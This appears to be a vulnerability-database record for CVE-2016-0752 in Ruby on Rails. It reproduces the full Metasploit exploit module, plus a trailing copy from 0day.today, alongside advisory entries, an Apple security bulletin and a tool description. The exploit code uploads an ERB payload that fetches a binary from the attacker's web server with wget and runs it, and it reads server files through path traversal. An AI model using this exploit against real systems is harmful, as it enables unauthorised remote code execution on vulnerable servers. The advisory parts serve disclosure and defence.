\"wget #{@service_url} -O /tmp/#{@bd};\"\r\n cmd << \"chmod 755 /tmp/#{@bd};\"\r\n cmd << \"/tmp/#{@bd}\"\r\n pay = \"<%=`#{cmd}`%>\"\r\n print_status(\"uploading image...\")\r\n data = Rex::MIME::Message.new\r\n data.add_part(pay, nil, nil, 'form-data; name=\"#{un}\"; filename=\"#{fn}.gif\"')\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => @cookie,\r\n 'uri' => normalize_uri(datastore['URIPATH'], pn),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => data.to_s\r\n })\r\n if res and res.code == 422 and res.body =~ /Tempfile:\\/(.*)>/\r\n @path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>/\r\n return true\r\n else\r\n\r\n # this is where we pull the log file\r\n if leak_log\r\n return true\r\n end\r\n end\r\n return false\r\n end\r\n\r\n def leak_log\r\n\r\n # path to the log /proc/self/fd/7\r\n # this bypasses the extension check\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], \"proc%2fself%2ffd%2f7\"),\r\n 'method' => 'GET',\r\n }, 60)\r\n\r\n if res and res.code == 200 and res.body =~ /Tempfile:\\/(.*)>, @original_filename=/\r\n @path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>, @original_filename=/\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def start_http_server\r\n @pl = generate_payload_exe\r\n @elf_sent = false\r\n downfile = rand_text_alpha(8+rand(8))\r\n resource_uri = '/' + downfile\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n # do not use SSL for the attacking web server\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n @service_url = \"http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}\"\r\n service_url_payload = srv_host + resource_uri\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\r\n start_service({'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => resource_uri\r\n }})\r\n datastore['SSL'] = true if ssl_restore\r\n connect\r\n end\r\n\r\n def render_tmpfile\r\n @path.gsub!(/\\//, '%2f')\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], @path),\r\n 'method' => 'GET',\r\n }, 1)\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending initial request to detect exploitability\")\r\n start_http_server\r\n if send_payload\r\n print_good(\"injected payload\")\r\n render_tmpfile\r\n\r\n # we need to delay, for the stager\r\n select(nil, nil, nil, 5)\r\n end\r\n end\r\nend\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/25576", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "saint": [{"lastseen": "2023-02-08T15:36:49", "description": "Added: 11/11/2016 \nCVE: [CVE-2016-0752](<https://vulners.com/cve/CVE-2016-0752>) \nBID: [81801](<http://www.securityfocus.com/bid/81801>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. \n\n### Problem\n\nA vulnerability in Ruby on Rails allows arbitrary code to be uploaded and executed on the server if the application endpoint users dynamic render paths. \n\n### Resolution\n\nUpgrade to Ruby on Rails 3.2.22.1, 4.1.14.1, 4.2.5.1, or higher. \n\n### References\n\n<https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/> \n\n\n### Limitations\n\nExploit works on Linux. The `**wget**` program must exist on the target. The URL path to an endpoint which uses dynamic render paths must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-11T00:00:00", "type": "saint", "title": "Ruby on Rails Dynamic Render code execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-11-11T00:00:00", "id": "SAINT:CE3D4DD89AD93E07E9236060DF64D24F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_dynamic_render", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-10T12:21:30", "description": "Added: 11/11/2016 \nCVE: [CVE-2016-0752](<https://vulners.com/cve/CVE-2016-0752>) \nBID: [81801](<http://www.securityfocus.com/bid/81801>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. \n\n### Problem\n\nA vulnerability in Ruby on Rails allows arbitrary code to be uploaded and executed on the server if the application endpoint users dynamic render paths. \n\n### Resolution\n\nUpgrade to Ruby on Rails 3.2.22.1, 4.1.14.1, 4.2.5.1, or higher. \n\n### References\n\n<https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/> \n\n\n### Limitations\n\nExploit works on Linux. The `**wget**` program must exist on the target. The URL path to an endpoint which uses dynamic render paths must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-11T00:00:00", "type": "saint", "title": "Ruby on Rails Dynamic Render code execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-11-11T00:00:00", "id": "SAINT:C60C9FE23283E404383AF2811DAC7B9A", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_dynamic_render", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:33:32", "description": "Added: 11/11/2016 \nCVE: [CVE-2016-0752](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0752>) \nBID: [81801](<http://www.securityfocus.com/bid/81801>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. \n\n### Problem\n\nA vulnerability in Ruby on Rails allows arbitrary code to be uploaded and executed on the server if the application endpoint users dynamic render paths. \n\n### Resolution\n\nUpgrade to Ruby on Rails 3.2.22.1, 4.1.14.1, 4.2.5.1, or higher. \n\n### References\n\n<https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/> \n\n\n### Limitations\n\nExploit works on Linux. The `**wget**` program must exist on the target. The URL path to an endpoint which uses dynamic render paths must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-11T00:00:00", "type": "saint", "title": "Ruby on Rails Dynamic Render code execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-11-11T00:00:00", "id": "SAINT:627CB79E1D20B9CA5F6ED2D62D3FF6BB", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_dynamic_render", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Directory traversal vulnerability in Action View in Ruby on Rails allows remote attackers to read arbitrary files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "Ruby on Rails Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2016-0752", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2022-11-02T13:41:14", "description": "This module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths, such as the following example: def show render params[:id] end Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This module doesnt use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution.\n", "cvss3": {}, "published": "2016-10-10T22:36:20", "type": "metasploit", "title": "Ruby on Rails Dynamic Render File Upload Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-MULTI-HTTP-RAILS_DYNAMIC_RENDER_CODE_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/rails_dynamic_render_code_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',\n 'Description' => %q{\n This module exploits a remote code execution vulnerability in the explicit render\n method when leveraging user parameters.\n This module has been tested across multiple versions of Ruby on Rails.\n The technique used by this module requires the specified\n endpoint to be using dynamic render paths, such as the following example:\n\n def show\n render params[:id]\n end\n\n Also, the vulnerable target will need a POST endpoint for the TempFile upload, this\n can literally be any endpoint. This module doesnt use the log inclusion method of\n exploitation due to it not being universal enough. Instead, a new code injection\n technique was found and used whereby an attacker can upload temporary image files\n against any POST endpoint and use them for the inclusion attack. Finally, you only\n get one shot at this if you are testing with the builtin rails server, use caution.\n },\n 'Author' =>\n [\n 'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector\n 'John Poulin (forced-request)' # original render bug finder\n ],\n 'References' =>\n [\n [ 'CVE', '2016-0752'],\n [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch\n [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016\n [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'bsd'],\n 'Arch' => ARCH_X86,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2016-10-16'))\n register_options(\n [\n Opt::RPORT(3000),\n OptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/users\"]),\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\n ])\n end\n\n def check\n\n # this is the check for the dev environment\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URIPATH'], \"%2f\"),\n 'method' => 'GET',\n }, 60)\n\n # if the page controller is dynamically rendering, its for sure vuln\n if res and res.body =~ /render params/\n return CheckCode::Vulnerable\n end\n\n # this is the check for the prod environment\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URIPATH'], \"%2fproc%2fself%2fcomm\"),\n 'method' => 'GET',\n }, 60)\n\n # if we can read files, its likley we can execute code\n if res and res.body =~ /ruby/\n return CheckCode::Appears\n end\n return CheckCode::Safe\n end\n\n def on_request_uri(cli, request)\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n def send_payload\n @bd = rand_text_alpha(8+rand(8))\n fn = rand_text_alpha(8+rand(8))\n un = rand_text_alpha(8+rand(8))\n pn = rand_text_alpha(8+rand(8))\n register_file_for_cleanup(\"/tmp/#{@bd}\")\n cmd = \"wget #{@service_url} -O /tmp/#{@bd};\"\n cmd << \"chmod 755 /tmp/#{@bd};\"\n cmd << \"/tmp/#{@bd}\"\n pay = \"<%=`#{cmd}`%>\"\n print_status(\"uploading image...\")\n data = Rex::MIME::Message.new\n data.add_part(pay, nil, nil, 'form-data; name=\"#{un}\"; filename=\"#{fn}.gif\"')\n res = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => @cookie,\n 'uri' => normalize_uri(datastore['URIPATH'], pn),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s\n })\n if res and res.code == 422 and res.body =~ /Tempfile:\\/(.*)>/\n @path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>/\n return true\n else\n\n # this is where we pull the log file\n if leak_log\n return true\n end\n end\n return false\n end\n\n def leak_log\n\n # path to the log /proc/self/fd/7\n # this bypasses the extension check\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URIPATH'], \"proc%2fself%2ffd%2f7\"),\n 'method' => 'GET',\n }, 60)\n\n if res and res.code == 200 and res.body =~ /Tempfile:\\/(.*)>, @original_filename=/\n @path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>, @original_filename=/\n return true\n end\n return false\n end\n\n def start_http_server\n @pl = generate_payload_exe\n @elf_sent = false\n downfile = rand_text_alpha(8+rand(8))\n resource_uri = '/' + downfile\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n # do not use SSL for the attacking web server\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n @service_url = \"http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}\"\n service_url_payload = srv_host + resource_uri\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n datastore['SSL'] = true if ssl_restore\n connect\n end\n\n def render_tmpfile\n @path.gsub!(/\\//, '%2f')\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URIPATH'], @path),\n 'method' => 'GET',\n }, 1)\n end\n\n def exploit\n print_status(\"Sending initial request to detect exploitability\")\n start_http_server\n if send_payload\n print_good(\"injected payload\")\n render_tmpfile\n\n # we need to delay, for the stager\n select(nil, nil, nil, 5)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/rails_dynamic_render_code_exec.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "apple": [{"lastseen": "2020-12-24T20:42:16", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Server 5.3\n\nReleased March 27, 2017\n\n**Profile Manager**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote user may be able to cause a denial-of-service\n\nDescription: A crafted request may cause a global cache to grow indefinitely, leading to a denial-of-service. This was addressed by not caching unknown MIME types.\n\nCVE-2016-0751\n\n**Web Server**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote attacker may be able to cause a denial of service against the HTTP server via partial HTTP requests\n\nDescription: This issue was addressed by adding mod_reqtimeout.\n\nCVE-2007-6750\n\n**Wiki Server**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote attacker may be able to enumerate users\n\nDescription: An access issue was addressed through improved permissions checking.\n\nCVE-2017-2382: Maris Kocins of SEMTEXX LTD\n", "edition": 3, "cvss3": {}, "published": "2017-03-28T04:58:08", "title": "About the security content of macOS Server 5.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2382", "CVE-2016-0751", "CVE-2007-6750"], "modified": "2017-03-28T04:58:08", "id": "APPLE:HT207604", "href": "https://support.apple.com/kb/HT207604", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-10T17:00:49", "description": "# About the security content of macOS Server 5.3\n\nThis document describes the security content of macOS Server 5.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Server 5.3\n\nReleased March 27, 2017\n\n**Profile Manager**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote user may be able to cause a denial-of-service\n\nDescription: A crafted request may cause a global cache to grow indefinitely, leading to a denial-of-service. This was addressed by not caching unknown MIME types.\n\nCVE-2016-0751\n\n**Web Server**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote attacker may be able to cause a denial of service against the HTTP server via partial HTTP requests\n\nDescription: This issue was addressed by adding mod_reqtimeout.\n\nCVE-2007-6750\n\n**Wiki Server**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote attacker may be able to enumerate users\n\nDescription: An access issue was addressed through improved permissions checking.\n\nCVE-2017-2382: Maris Kocins of SEMTEXX LTD\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 28, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of macOS Server 5.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-6750", "CVE-2016-0751", "CVE-2017-2382"], "modified": "2017-03-27T00:00:00", "id": "APPLE:B9A45A59599AAB4A4CDF843F56D06965", "href": "https://support.apple.com/kb/HT207604", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:14", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjsrmhQfDtTdfBPNa6qZgsSf3u30VLPYC3uKiVcyq9ZGHj16L1OT3WrO1HfwDyWXqnHKHPKJbSTz2Whniw57u-WtS5y_mcQsWyfzNYadEoNL2ZgYGTEeORZsjTrJzIDyx8ZUunfcL0CntifHoVg48hyGjYPR8doMybpPRTOwLUqmaUvooKWE3KXcFIO>)\n\n \n\n\nA simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities.\n\n \n\n\nTo install requirements:\n \n \n $ sudo python3 -m pip install -r requirements.txt \n \n\nOverview:\n\nvulnerabilities on local libraries by CoolerVoid Example: $ python3 master_librarian.py -t csv $ python3 master_librarian.py -t txt -l 3 usage: master_librarian.py [-h] -t TYPES [-l LIMIT] optional arguments: -h, --help show this help message and exit -t TYPES, --type TYPES Name of output type for logs(txt or csv) -l LIMIT, --limit LIMIT Limit CVEs per pages in nvd NIST search(default is 3) \">\n \n \n $ python3 master_librarian.py -h \n Master librarian v0.3 \n Tool to search public vulnerabilities on local libraries \n by CoolerVoid \n \n Example: \n \t$ python3 master_librarian.py -t csv \n \t$ python3 master_librarian.py -t txt -l 3 \n \n usage: master_librarian.py [-h] -t TYPES [-l LIMIT] \n \n optional arguments: \n -h, --help show this help message and exit \n -t TYPES, --type TYPES \n Name of output type for logs(txt or csv) \n -l LIMIT, --limit LIMIT \n Limit CVEs per pages in nvd NIST search(default is 3) \n \n \n\nExample:\n \n \n $ python3 master_librarian.py -t txt \n \n\noutput\n\nvulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server. https://nvd.nist.gov/vuln/detail/CVE-2020-13529 2.9 LOW systemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082. https://nvd.nist.gov/vuln/detail/CVE-2020-13776 6.2 MEDIUM A heap use-after-free vulnerability was found in systemd before version v245-rc1, where asynchronous Polkit queries are performed while handling dbus messages. A local unprivileged attacker can abuse this flaw to crash systemd services or potentially execute code and elevate their privileges, by sending specially crafted dbus messages. https://nvd.nist.gov/vuln/detail/CVE-2020-1712 4.6 MEDIUM expat 2.2.9 pangocairo 1.44.7 xdmcp 1.1.3 libpcreposix 8.39 ruby-2.7 2.7.0 glib-2.0 2.64.6 gnome-system-tools 3.0.0 xinerama 1.1.4 nunit 2.6.3 gmp 6.2.0 libevent 2.1.11-stable xbuild12 12.0 xorg-sgml-doctools 1.11 presentproto 1.2 gdk-pixbuf-2.0 2.40.0 inputproto 2.3.2 libssl 1.1.1f xcb-shm 1.14 gdk-2.0 2.24.32 libpng16 1.6.37 bigreqsproto 1.1.2 icu-io 66.1 xextproto 7.3.0 libthai 0.1.28 libbsd-overlay 0.10.0 mount 2.34.0 gio-2.0 2.64.6 adwaita-icon-theme 3.36.1 fontconfig 2.13.1 xrandr 1.5.2 monosgen-2 6.8.0.105 mono 6.8.0.105 xf86dgaproto 2.1 dri3proto 1.2 libpcre 8.39 pangoxft 1.44.7 blkid 2.34.0 libsepol 3.0 libevent_openssl 2.1.11-stable uuid 2.34.0 gmodule-2.0 2.64.6 graphite2 3.0.1 libfl 2.6.4 zlib 1.2.11 cairo-pdf 1.16.0 ruby 2.7.0 Addressable is an alternative implementation to the URI implementation that is part of Ruby's standard library. An uncontrolled resource consumption vulnerability exists after version 2.3.0 through version 2.7.0. Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption, leading to [denial of service](<https://www.kitploit.com/search/label/Denial%20of%20Service> \"denial of service\" ) when matched against a URI. In typical usage, templates would not normally be read from untrusted user input, but nonetheless, no previous security advisory for Addressable has cautioned against doing this. Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected. The vulnerability is patched in version 2.8.0. As a workaround, only create Template objects from trusted sources that have been validated not to produce catastrophic backtracking. https://nvd.nist.gov/vuln/detail/CVE-2021-32740 5.0 MEDIUM An issue was discovered in Ruby 2.5.x through 2.5.7, 2.6.x through 2.6.5, and 2.7.0. If a victim calls BasicSocket#read_nonblock(requested_size, buffer, exception: false), the method resizes the buffer to fit the requested size, but no data is copied. Thus, the buffer string provides the previous value of the heap. This may expose possibly sensitive data from the interpreter. https://nvd.nist.gov/vuln/detail/CVE-2020-10933 5.0 MEDIUM libevent_extra 2.1.11-stable system.web.mvc3 3.0.0.0 libstartup-notification-1.0 0.12 mono-2 6.8.0.105 mono-nunit 2.6.3 gobject-2.0 2.64.6 glproto 1.4.17 cairo-ft 1.16.0 cairo 1.16.0, in cairo_ft_apply_variations() in cairo-ft-font.c, would free memory using a free function incompatible with WebKit's fastMalloc, leading to an application crash with a \"free(): invalid pointer\" error. https://nvd.nist.gov/vuln/detail/CVE-2018-19876 4.3 MEDIUM xcb 1.14 Directory traversal vulnerability in Action View in [Ruby on Rails](<https://www.kitploit.com/search/label/Ruby%20on%20Rails> \"Ruby on Rails\" ) before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. https://nvd.nist.gov/vuln/detail/CVE-2016-0752 5.0 MEDIUM fribidi 1.0.8 xtrans 1.4.0 cairo-xlib-xrender 1.16.0 mono-lineeditor 0.2.1 xcmiscproto 1.2.2 gmodule-no-export-2.0 2.64.6 dri2proto 2.8 python3-embed 3.8 libpcre32 8.39 system.web.mvc2 2.0.0.0 dotnet 6.8.0.105 iso-codes 4.4 fontutil 1.3.1 xbitmaps 1.1.1 system.web.extensions_1.0 1.0.61025.0 recordproto 1.14.2 resourceproto 1.2.0 mobile-broadband-provider-info 20190618 videoproto 2.3.3 libevent_core 2.1.11-stable fontsproto 2.1.3 xsp-4 4.2 python3 3.8 In Python 